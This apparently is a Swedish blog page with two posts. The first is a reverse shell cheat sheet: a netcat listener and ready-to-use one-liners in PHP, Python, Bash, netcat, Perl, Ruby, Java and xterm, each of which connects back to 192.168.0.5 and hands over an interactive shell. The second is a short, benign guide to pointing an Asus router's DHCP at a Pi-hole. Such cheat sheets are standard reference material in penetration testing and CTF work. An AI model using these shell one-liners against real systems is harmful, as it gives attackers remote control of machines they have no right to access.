Reverse shell

Börja med att skriva det här lokalt: nc -l -p 4444 -vvv

Och på remote sidan gör du någon av dessa

Php :

php -r '$sock=fsockopen("192.168.0.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Python :

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash :

bash -i >& /dev/tcp/192.168.0.5/4444 0>&1

Netcat :

nc -e /bin/sh 192.168.0.5 4444

Perl :

perl -e 'use Socket;$i="192.168.0.5";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby :

ruby -rsocket -e'f=TCPSocket.open("192.168.0.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java :

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.5/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

xterm :

xterm -display 192.168.0.5:4444

Source https://github.com/ismailtasdelen/reverse-shell-cheatsheet

PiHole och Asus RT-N66U

Om har tänkt till och beslutat dig för att köra PiHole på ditt nät så kan jag bara säga grattis. 

När du har satt upp allt efter konstens alla regler, dvs. stängt av DHCP i routern och ställt in allt i din PiHole (RPI eller Virtuell) så kom då ihåg att SSH:a in till routern och editera /etc/dnsmasq.conf. Lägg till

dhcp-option=6,192.168.1.3

OBS! Adressen ovan (192.168.1.3) ändrar du till den IP du gett till din egna PiHole

När du sedan startat om så kommer *all* trafik att gå via PiHole och du kommer även att se alla hostar som passerar via den. Du kommer helt enkelt att få bättre koll.

Det är för övrigt alternativ 2 i den här beskrivningen https://discourse.pi-hole.net/t/how-do-i-configure-my-devices-to-use-pi-hole-as-their-dns-server/245